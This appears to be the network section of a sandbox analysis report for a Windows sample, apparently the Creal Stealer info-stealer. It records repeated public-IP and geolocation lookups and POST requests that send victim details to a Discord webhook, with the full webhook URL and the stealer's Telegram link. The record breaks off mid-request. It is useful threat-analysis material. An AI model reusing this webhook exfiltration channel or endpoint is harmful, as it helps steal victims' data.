                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST1.1.1.1192.168.2.80xce2eNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                • api.ipify.org
                                                                                                                                                                                                                                                                                                • geolocation-db.com
                                                                                                                                                                                                                                                                                                • discord.com
                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                0192.168.2.849706172.67.74.1524434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:44 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:44 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:44 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9ccfb4d8744386-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:44 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                1192.168.2.849708159.89.102.2534434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:45 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:45 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                2192.168.2.849709162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC1351INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:46 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2c2548ac7cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453928
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xovJQK%2BUb%2BSRoiWGWkZ%2FgK%2FXYFN8quOhjeQVzrVNZhFTlqUu%2BRoTMkJ8aKXQCTOZR2Fiyxi3zI%2FAWqzoIfMqas%2BNd%2F9z5lWD4Fw3f%2B2rX3NvfiQZgq%2F%2Fw4YCseFD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2c2548ac7cec11ef96902e88ff6945860574171a8514fb3dbed8872d2b00dc2dccec3c3323101a3641fb73b584d3e0dd; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=d88352afcbe6c0495ada4acc41fdf5b344043843-1727453926; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 62 6f 79 49 38 76 4f 74 6f 4f 6d 51 73 6d 4b 37 6b 64 39 2e 6a 50 4f 67 6b 31 59 79 63 53 49 57 75 62 65 38 39 61 53 51 5a 49 2d 31 37 32 37 34 35 33 39 32 36 36 36 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 31 34 62 32 33 34 34 30 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=UboyI8vOtoOmQsmK7kd9.jPOgk1YycSIWube89aSQZI-1727453926666-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc14b23440d-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:46 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                3192.168.2.849710162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:47 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2c884cae7cec11efb7d996c5ef0f4df4; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453928
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSKOyIVVhqjejoFtO0Y62dBcZKdHqGnV96QBVRkYjfz%2BB3FJ2X5fqSJLqRJeM3Nfz61owU5d0917%2FmmRa2OGz1UVQolOJivICCKm4nVjLZljCq17CcJ1XRHlPsYr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2c884cae7cec11efb7d996c5ef0f4df4af77d857d1ca82c06705918a393e1383f4d5bb766d3204b3dbd951095cc23a8e; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 54 2e 4e 31 70 52 57 62 42 30 4b 57 6f 54 4d 4a 6e 43 44 6f 4c 7a 64 4a 49 44 75 6a 47 6e 56 43 59 42 79 75 77 5a 74 39 37 53 51 2d 31 37 32 37 34 35 33 39 32 37 33 31 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 35 35 61 31 31 34 33 38 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=T.N1pRWbB0KWoTMJnCDoLzdJIDujGnVCYByuwZt97SQ-1727453927314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc55a11438b-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                4192.168.2.849711172.67.74.1524434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:47 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9ccfc718b10c8e-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                5192.168.2.849712162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:47 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:47 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2ceda5867cec11efb49f26388b8e290c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453929
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VLiIZL9CiQDwsZsVVM8xkihe3RdWMatsLZYBBAjlz8rE9BHI2e5hEMvigE6G%2FL8Jc4DZ8agV%2F3NwXezHs%2BzHNaIa5duVfIB5aZqf4xvbW1NQ5TWu7ICnloS2teB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2ceda5867cec11efb49f26388b8e290c1c04bc1da02c529961f307b8cc5d202341e437e6ba8755640047164057bc7b5c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 59 32 64 53 5a 6c 38 49 30 6b 30 61 48 32 4d 6e 62 39 36 38 36 33 6d 66 63 65 66 72 2e 31 50 70 72 64 38 48 7a 6b 53 52 70 48 38 2d 31 37 32 37 34 35 33 39 32 37 39 38 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 39 38 66 62 31 34 31 62 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=Y2dSZl8I0k0aH2Mnb96863mfcefr.1Pprd8HzkSRpH8-1727453927982-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc98fb141bd-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                6192.168.2.849713159.89.102.2534434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:48 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                7192.168.2.849714162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
